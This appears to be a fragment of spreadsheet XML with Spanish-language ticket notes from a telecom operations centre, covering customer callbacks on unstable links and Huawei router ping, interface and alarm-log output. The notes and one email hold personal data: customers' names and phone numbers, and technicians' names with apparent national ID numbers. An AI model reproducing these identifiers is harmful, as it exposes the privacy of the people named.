    <t>**SE LLAMA A CLIENTE AL BRITANY URETA 53514917 INDICA QUE EL SERVICIO ESTA MUY INESTABLE QUE POR RATOS TIENE EL SERVICIO Y POR RATOS NO || SE NOTIFICA A GESTOR **
ID 200144 1733
**</t>
  </si>
  <si>
    <t>F4578596</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR SIEMPRE LOS PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 27 DE MAYO DE 2022 13:23
PARA: MIGUEL.GOMEZ@DOIH.HN &lt;MIGUEL.GOMEZ@DOIH.HN&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 1427954OH |OH1000834398 | BOULEVARD JUAN PABLO SEGUNDO; COL. LOMAS DEL MAYAB; CENTRO CIVICO GUBERNAMENTAL, UBICADO FRENTE A CENTRO COMERCIAL SANTA MONICA; TEGUCIGALPA.
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 1427954OH |OH1000834398  |  BOULEVARD JUAN PABLO SEGUNDO; COL. LOMAS DEL MAYAB; CENTRO CIVICO GUBERNAMENTAL, UBICADO FRENTE A CENTRO COMERCIAL SANTA MONICA; TEGUCIGALPA.
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO. INDICANDO EL DÍA Y HORA DE VISITA.
TECNICOS:
GEORED CESAR ALEJANDRO FLORES AMAYA               0826-1991-00164 8733-6507
GEORED JULIO CESAR MENDOZA HERNANDEZ           0801-1987-19060 3177-1794
GEORED JOSE LUIS VARELA RUBI                                    0801-1993-08148 9793-1191
GEORED RUBÉN ALFREDO VELÁSQUEZ MADARIAGA 0801-1990-16905 9903-9117
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4578599</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE NATALY EN LINEA, VALIDANDO PRUEBAS DE PRIMER NIVEL
2001440043
COLA:
NOMBRE: A: 30246026
NÚMERO: 011 50223049696
DURACIÓN: 0:02:01
ESTADO: CONECTADA
DETALLES: +50223049696
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 26/05/2022 16:17:53</t>
  </si>
  <si>
    <t>F4578608</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN MENDOZA AL 87807282 || SE CONTACTA A GESTOR Y SE DEJA EN LINEA
CON CLIENTE**
ID 2001444183
**</t>
  </si>
  <si>
    <t>F4578619</t>
  </si>
  <si>
    <t xml:space="preserve"> 26/05/2022 16:57:20 GUATEMALA/CENTRO AMERICA (OMAR ALBERTO OCHOA HID):
SE CONTACTA  A CLIENTE ELVIS PORTILLO 78131350 QUIEN INDICA QUE SE PROGRAME LA VISITA PARA EL DÍA DE MAÑANA DEBIDO A QUE ELLOS YA CERRARON Y POR EL TIEMPO DE LLEGADA ES MEJOR PARA ELLOS REPROGRAMAR PARA LAS 08:00 HRS EL DIA DE MAÑANA.
2001451115</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ELVIS PORTILLO 78131350, SE CORTO LLAMADA, DE IGUAL FORMA LA VISITA ES AL NODO, SE PROCEDE A SOLICITAR APOYO DE CAMPO.</t>
  </si>
  <si>
    <t>F4578633</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 37610279 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.
ADICIONAL SE CONSULTA A CNOC CLARO VÍA SKYPE CÓMO SIGUEN VIENDO SERVICIO?</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VÍCTOR TECUN - 37610279 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001514018</t>
  </si>
  <si>
    <t>F4578647</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  SRTA. LOURDES  AL 96508091  NO RESPONDE, SE INTENTARA LUEGO **
ID 2001492512
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  SRTA. LOURDES  AL 96508091  NO RESPONDE,  ENVIA DIRECTO A BUZON SE INTENTARA LUEGO **
ID 2001502097
**</t>
  </si>
  <si>
    <t>F4578658</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGIE BANEGAS AL 33807274 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001506518 - 2001509485
**</t>
  </si>
  <si>
    <t>F4578663</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA JOSE 56202931  MENCIONA QUE PERSISTE EL PROBLEMA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001453929</t>
  </si>
  <si>
    <t>F4578675</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR ALDANA 32573659 MENCIONA QUE NO SE ENCUENTRA EN PR  JULIO VILLEGAS - 56920226
-ID 2001446570</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO VILLEGAS - 56920226 MENCIONA QUE PRESENTARON PROBLEMAS DE ENERGIA PERO ACTUALMENTE YA TODO ESTA BIEN
CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001448052</t>
  </si>
  <si>
    <t>F4578676</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. BYRON GOMEZ 77401515 NO CONTESTA, IVR ENVIA A BUZON,  ID: 2001462168. COMO LA AFECTACION SE OBSERVA DESDE EL NODO, SE SOLICITA APOYO A CAMPO PARA QUE REVISEN DESDE EL NODO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARDOQUEO ORTEGA 53520130 MENCIONA QUE PRESENTARON UNA CAIDA A LAS 7:30 APROX PERO QUE AHORITA ESTA OPERATIVO Y ESTABLE
CLIENTE SOLICITA LLAMADA PARA LAS 11:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 2001505306</t>
  </si>
  <si>
    <t>&lt;EESCGTESN1T1A04B02EIM4&gt;PING -VPN ADMIN_WIMAX_ISLAS 10.16.165.144
  PING 10.16.165.144: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.16.165.144: BYTES=56 SEQUENCE=1 TTL=64 TIME=44 MS
    REPLY FROM 10.16.165.144: BYTES=56 SEQUENCE=2 TTL=64 TIME=37 MS
    REPLY FROM 10.16.165.144: BYTES=56 SEQUENCE=3 TTL=64 TIME=49 MS
    REPLY FROM 10.16.165.144: BYTES=56 SEQUENCE=4 TTL=64 TIME=51 MS
    REPLY FROM 10.16.165.144: BYTES=56 SEQUENCE=5 TTL=64 TIME=37 MS</t>
  </si>
  <si>
    <t>PRST Y BSR NO SALEN DE PE 10.179.28.28 SE TIENE RESPUESTA A PING OMITIR COMENTARIO ANTERIOR</t>
  </si>
  <si>
    <t>SE LLAMA A SUPERVISOR ESTUARDO LOPEZ PARA ASIGNACION DE PERSONAL TECNICO , SE TRASLADARA A NODO YA QUE SE VEN DESCONEXIONES EN SW ACCESO</t>
  </si>
  <si>
    <t>SE VEN DESCCONEXIONES EN WAN Y SE VEN ERRORES EN INTERFACE ACCESOS EN NODO
&lt;EGOMGTCON1W1A01AA1YOM1&gt;DIS INTERFACE  GI0/2/0
GIGABITETHERNET0/2/0 CURRENT STATE : UP (IFINDEX: 6)
LINE PROTOCOL CURRENT STATE : UP
LINK QUALITY GRADE : GOOD
DESCRIPTION: INGENIO_LA_UNION2_WIMAX
SWITCH PORT, TPID : 8100(HEX), THE MAXIMUM TRANSMIT UNIT(L3) IS 1500 BYTES, THE MAXIMUM RECEIVE UNIT(L2) IS 9600 BYTES
INTERNET PROTOCOL PROCESSING : DISABLED
IP SENDING FRAMES' FORMAT IS PKTFMT_ETHNT_2, HARDWARE ADDRESS IS AC8D-34EF-48B8
MEDIA TYPE: TWISTED-PAIR ,LINK TYPE: AUTO NEGOTIATION
LOOPBACK:NONE, MAXIMAL BW:1G, CURRENT BW:100M, FULL-DUPLEX MODE, NEGOTIATION: ENABLE, PAUSE FLOWCONTROL:RECEIVE ENABLE AND SEND DISABLE
LAST PHYSICAL UP TIME   : 2022-05-27 10:18:28-06:00
LAST PHYSICAL DOWN TIME : 2022-05-27 10:07:26-06:00
CURRENT SYSTEM TIME: 2022-05-27 11:09:39-06:00
STATISTICS LAST CLEARED:NEVER
    LAST 300 SECONDS INPUT RATE: 72681 BITS/SEC, 10 PACKETS/SEC
    LAST 300 SECONDS OUTPUT RATE: 9980 BITS/SEC, 10 PACKETS/SEC
    INPUT PEAK RATE 2585658 BITS/SEC, RECORD TIME: 2021-09-08 06:57:59-06:00
    OUTPUT PEAK RATE 4525874 BITS/SEC, RECORD TIME: 2022-02-04 14:24:53-06:00
    INPUT: 42426763588 BYTES, 188238061 PACKETS
    OUTPUT: 304101199141 BYTES, 331252076 PACKETS
    INPUT:
      UNICAST: 187310376 PACKETS, MULTICAST: 407793 PACKETS
      BROADCAST: 10844 PACKETS, JUMBOOCTETS: 8248774 PACKETS
      CRC: 411791 PACKETS, SYMBOL: 2 PACKETS
      OVERRUN: 0 PACKETS, INRANGELENGTH: 0 PACKETS
      LONGPACKET: 0 PACKETS, JABBER: 0 PACKETS, ALIGNMENT: 307264 PACKETS
      FRAGMENT: 97257 PACKETS, UNDERSIZED FRAME: 0 PACKETS
      RXPAUSE: 0 PACKETS
    OUTPUT:
      UNICAST: 321708035 PACKETS, MULTICAST: 2882109 PACKETS
      BROADCAST: 6661932 PACKETS, JUMBOOCTETS: 118649202 PACKETS
      LOST: 0 PACKETS, OVERFLOW: 0 PACKETS, UNDERRUN: 0 PACKETS
      SYSTEM: 0 PACKETS, OVERRUNS: 0 PACKETS
      TXPAUSE: 0 PACKETS
    LAST 300 SECONDS INPUT UTILITY RATE:  0.07%
    LAST 300 SECONDS OUTPUT UTILITY RATE: 0.01%
&lt;EGOMGTCON1W1A01AA1YOM1&gt;DIS LOGB
LOGGING BUFFER CONFIGURATION AND CONTENTS : ENABLED
ALLOWED MAX BUFFER SIZE : 10240
ACTUAL BUFFER SIZE : 512
CHANNEL NUMBER : 4 , CHANNEL NAME : LOGBUFFER
DROPPED MESSAGES : 0
OVERWRITTEN MESSAGES : 44172
CURRENT MESSAGES : 512
MAY 27 2022 11:00:35-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID20220527170008000443AA00000000279466)
MAY 27 2022 11:00:25-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/START_ACCT_FAIL(L):CID=0X80D10438;FAILED TO START THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID20220527170008000443AA00000000279466)
MAY 27 2022 10:18:28-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_CLEAR(L):CID=0X807A0416-ALARMID=0X08520003-CLEARTYPE=SERVICE_RESUME;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=UP, REASON=INTERFACE PHYSICAL LINK IS UP, MAINIFNAME=GIGABITETHERNET0/2/0)
MAY 27 2022 10:18:28-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
MAY 27 2022 10:18:26-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_CLEAR(L):CID=0X80FA0016-ALARMID=0X0813007C-CLEARTYPE=SERVICE_RESUME;LOSS OF SIGNAL ALARM RESUME.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 10:07:27-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_ACTIVE(L):CID=0X80FA0016-ALARMID=0X0813007C;LOSS OF SIGNAL ALARM.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 10:07:26-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
MAY 27 2022 10:07:26-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_ACTIVE(L):CID=0X807A0416-ALARMID=0X08520003;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=DOWN, REASON=INTERFACE PHYSICAL LINK IS DOWN, MAINIFNAME=GIGABITETHERNET0/2/0)
MAY 27 2022 10:07:26-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DRIVER/3/HWPORTDOWNREASON(L):CID=0X80FC0116;THE PHYSICAL STATUS OF THE PORT0 ON CARD0 IN SLOT 2 CHANGED TO DOWN. THE POSSIBLE CAUSE IS: LINK_FAIL
MAY 27 2022 09:13:13-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_CLEAR(L):CID=0X807A0416-ALARMID=0X08520003-CLEARTYPE=SERVICE_RESUME;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=UP, REASON=INTERFACE PHYSICAL LINK IS UP, MAINIFNAME=GIGABITETHERNET0/2/0)
MAY 27 2022 09:13:13-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
MAY 27 2022 09:13:12-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_CLEAR(L):CID=0X80FA0016-ALARMID=0X0813007C-CLEARTYPE=SERVICE_RESUME;LOSS OF SIGNAL ALARM RESUME.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 09:02:55-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
MAY 27 2022 09:02:55-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_ACTIVE(L):CID=0X80FA0016-ALARMID=0X0813007C;LOSS OF SIGNAL ALARM.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 09:02:54-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_ACTIVE(L):CID=0X807A0416-ALARMID=0X08520003;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=DOWN, REASON=INTERFACE PHYSICAL LINK IS DOWN, MAINIFNAME=GIGABITETHERNET0/2/0)</t>
  </si>
  <si>
    <t>ENLACE FUERA, RBS, PRST
&lt;EESCGTESN1T1A03B02EIM3&gt;PING -VPN ADMIN_WIMAX_ISLAS 10.87.118.188
  PING 10.87.118.188: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.87.118.188 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;EESCGTESN1T1A03B02EIM3&gt;PING -VPN ADMIN_WIMAX_ISLAS 10.16.165.144
  PING 10.16.165.144: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.16.165.144 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS</t>
  </si>
  <si>
    <t>ENVENTOS SW ACCESO
&lt;EGOMGTCON1W1A01AA1YOM1&gt;DIS INTER GI0/2/0
GIGABITETHERNET0/2/0 CURRENT STATE : UP (IFINDEX: 6)
LINE PROTOCOL CURRENT STATE : UP
LINK QUALITY GRADE : GOOD
DESCRIPTION: INGENIO_LA_UNION2_WIMAX
SWITCH PORT, TPID : 8100(HEX), THE MAXIMUM TRANSMIT UNIT(L3) IS 1500 BYTES, THE MAXIMUM RECEIVE UNIT(L2) IS 9600 BYTES
INTERNET PROTOCOL PROCESSING : DISABLED
IP SENDING FRAMES' FORMAT IS PKTFMT_ETHNT_2, HARDWARE ADDRESS IS AC8D-34EF-48B8
MEDIA TYPE: TWISTED-PAIR ,LINK TYPE: AUTO NEGOTIATION
LOOPBACK:NONE, MAXIMAL BW:1G, CURRENT BW:100M, FULL-DUPLEX MODE, NEGOTIATION: ENABLE, PAUSE FLOWCONTROL:RECEIVE ENABLE AND SEND DISABLE
LAST PHYSICAL UP TIME   : 2022-05-27 09:13:13-06:00
LAST PHYSICAL DOWN TIME : 2022-05-27 09:02:54-06:00
CURRENT SYSTEM TIME: 2022-05-27 09:21:01-06:00
STATISTICS LAST CLEARED:NEVER
    LAST 300 SECONDS INPUT RATE: 6681 BITS/SEC, 4 PACKETS/SEC
    LAST 300 SECONDS OUTPUT RATE: 9254 BITS/SEC, 4 PACKETS/SEC
    INPUT PEAK RATE 2585658 BITS/SEC, RECORD TIME: 2021-09-08 06:57:59-06:00
    OUTPUT PEAK RATE 4525874 BITS/SEC, RECORD TIME: 2022-02-04 14:24:53-06:00
    INPUT: 42403237988 BYTES, 188146023 PACKETS
    OUTPUT: 304026882057 BYTES, 331140774 PACKETS
    INPUT:
      UNICAST: 187218459 PACKETS, MULTICAST: 407688 PACKETS
      BROADCAST: 10828 PACKETS, JUMBOOCTETS: 8241477 PACKETS
      CRC: 411791 PACKETS, SYMBOL: 2 PACKETS
      OVERRUN: 0 PACKETS, INRANGELENGTH: 0 PACKETS
      LONGPACKET: 0 PACKETS, JABBER: 0 PACKETS, ALIGNMENT: 307264 PACKETS
      FRAGMENT: 97257 PACKETS, UNDERSIZED FRAME: 0 PACKETS
      RXPAUSE: 0 PACKETS
    OUTPUT:
      UNICAST: 321598591 PACKETS, MULTICAST: 2881910 PACKETS
      BROADCAST: 6660273 PACKETS, JUMBOOCTETS: 118611209 PACKETS
      LOST: 0 PACKETS, OVERFLOW: 0 PACKETS, UNDERRUN: 0 PACKETS
      SYSTEM: 0 PACKETS, OVERRUNS: 0 PACKETS
      TXPAUSE: 0 PACKETS
    LAST 300 SECONDS INPUT UTILITY RATE:  0.01%
    LAST 300 SECONDS OUTPUT UTILITY RATE: 0.01%</t>
  </si>
  <si>
    <t>SE VEN EVENTOS EN SW ACCESO,  EN HORARIOS QUE CLIENTE PRESENTA DESCONEXIONES
MAY 27 2022 08:50:07-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID202205271441330004439500000000279445)
MAY 27 2022 07:43:46-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_CLEAR(L):CID=0X807A0416-ALARMID=0X08520003-CLEARTYPE=SERVICE_RESUME;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=UP, REASON=INTERFACE PHYSICAL LINK IS UP, MAINIFNAME=GIGABITETHERNET0/2/0)
MAY 27 2022 07:43:46-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
MAY 27 2022 07:43:44-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_CLEAR(L):CID=0X80FA0016-ALARMID=0X0813007C-CLEARTYPE=SERVICE_RESUME;LOSS OF SIGNAL ALARM RESUME.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 07:34:13-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_ACTIVE(L):CID=0X80FA0016-ALARMID=0X0813007C;LOSS OF SIGNAL ALARM.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 07:34:12-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
MAY 27 2022 07:34:12-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_ACTIVE(L):CID=0X807A0416-ALARMID=0X08520003;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=DOWN, REASON=INTERFACE PHYSICAL LINK IS DOWN, MAINIFNAME=GIGABITETHERNET0/2/0)
MAY 27 2022 07:34:12-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DRIVER/3/HWPORTDOWNREASON(L):CID=0X80FC0116;THE PHYSICAL STATUS OF THE PORT0 ON CARD0 IN SLOT 2 CHANGED TO DOWN. THE POSSIBLE CAUSE IS: LINK_FAIL
MAY 27 2022 07:28:42-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID202205271320110004438C00000000279436)
MAY 27 2022 06:16:46-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_CLEAR(L):CID=0X807A0416-ALARMID=0X08520003-CLEARTYPE=SERVICE_RESUME;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=UP, REASON=INTERFACE PHYSICAL LINK IS UP, MAINIFNAME=GIGABITETHERNET0/2/0)
MAY 27 2022 06:16:46-06:00 EGOMGTCON1W1A01AA1YOM1 %%01PIC/1/HWPORTDOWN_CLEAR(L):CID=0X80FA0016-ALARMID=0X0813005B-CLEARTYPE=SERVICE_RESUME;THE PHYSICAL STATUS OF THE PORT CHANGED TO UP. (ENTITYPHYSICALINDEX=16912641, ENTPHYSICALINDEX=16912641, ENTPHYSICALNAME=GIGABITETHERNET0/2/0, ENTITYTRAPFAULTID=144384, IFOPERSTATUS=1, IFADMINSTATUS=1)
MAY 27 2022 06:16:44-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_CLEAR(L):CID=0X80FA0016-ALARMID=0X0813007C-CLEARTYPE=SERVICE_RESUME;LOSS OF SIGNAL ALARM RESUME.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 06:16:26-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID202205271207250004438500000000279429)
MAY 27 2022 06:15:05-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=NAHP, ACCTSESSIONID=ACCTID202205271213150004438600000000279430)
MAY 27 2022 06:07:13-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DEVM/1/HWLOSALARM_ACTIVE(L):CID=0X80FA0016-ALARMID=0X0813007C;LOSS OF SIGNAL ALARM.(HWPHYSICALPORTIFINDEX=16912641,SLOTID=2,CARDID=0,PORTID=0,INTERFACENAME=GIGABITETHERNET0/2/0,ALARMNAME=ETH_LOS)
MAY 27 2022 06:07:12-06:00 EGOMGTCON1W1A01AA1YOM1 %%01PIC/1/HWPORTDOWN_ACTIVE(L):CID=0X80FA0016-ALARMID=0X0813005B;THE PHYSICAL STATUS OF THE PORT CHANGED TO DOWN. (ENTITYPHYSICALINDEX=16912641, ENTPHYSICALINDEX=16912641, ENTPHYSICALNAME=GIGABITETHERNET0/2/0, ENTITYTRAPFAULTID=144384, HWPORTDOWNREASON=LOS, IFOPERSTATUS=2, IFADMINSTATUS=1)
MAY 27 2022 06:07:12-06:00 EGOMGTCON1W1A01AA1YOM1 %%01IFNET/2/LINKDOWN_ACTIVE(L):CID=0X807A0416-ALARMID=0X08520003;THE INTERFACE STATUS CHANGES. (IFNAME=GIGABITETHERNET0/2/0, ADMINSTATUS=UP, OPERSTATUS=DOWN, REASON=INTERFACE PHYSICAL LINK IS DOWN, MAINIFNAME=GIGABITETHERNET0/2/0)
MAY 27 2022 06:07:12-06:00 EGOMGTCON1W1A01AA1YOM1 %%01DRIVER/3/HWPORTDOWNREASON(L):CID=0X80FC0116;THE PHYSICAL STATUS OF THE PORT0 ON CARD0 IN SLOT 2 CHANGED TO DOWN. THE POSSIBLE CAUSE IS: LINK_FAIL
MAY 27 2022 01:39:59-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID202205270739370004437B00000000279419)
MAY 27 2022 01:39:51-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID202205270739420004437C00000000279420)
MAY 27 2022 01:39:47-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/START_ACCT_FAIL(L):CID=0X80D10438;FAILED TO START THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID202205270739420004437C00000000279420)
MAY 27 2022 00:54:17-06:00 EGOMGTCON1W1A01AA1YOM1 %%01AAA/4/STOP_ACCT_FAIL(L):CID=0X80D10438;FAILED TO STOP THE NORMAL ACCOUNTING. (USER=N2000, ACCTSESSIONID=ACCTID202205270645170004437800000000279416)</t>
  </si>
  <si>
    <t>ENLACE ACTIVO Y ESTABLE
&lt;EESCGTESN1T1A03B02EIM3&gt;PING -C 3000 -S 1500 -M 30 -B -VPN-INSTANCE LAUNION2 192.168.20.1
  PING 192.168.20.1: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!